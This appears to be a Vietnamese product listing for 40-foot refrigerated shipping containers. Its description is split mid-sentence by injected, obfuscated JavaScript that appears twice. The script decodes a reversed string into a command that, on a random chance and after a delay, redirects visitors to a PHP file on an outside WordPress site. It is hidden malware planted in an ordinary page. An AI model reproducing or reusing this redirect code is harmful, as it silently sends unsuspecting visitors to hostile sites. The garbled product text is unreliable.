CONTAINER LẠNH 40 FEET

    lanh 40 2

    THUỘC TÍNH CƠ BẢN CỦA CONTAINER LẠNH 40 FEET container lạnh hoạt động chung với máy lạnh khi vận chuyển container lạnh 40 feet$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} trên xe container, thì máy lạnh có thể hoạt động nhờ các thiết bị điện chạy bằng dầu để máy lạnh hoạt động ta nối các nguồn điện của container lạnh với nguồn điện của container cung cấp Công dụng:  container lạnh 40 feet do Trưởng Thanh container$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ...Tìm hiểu thêm

    Đăng 3 năm trước

    0 người Comments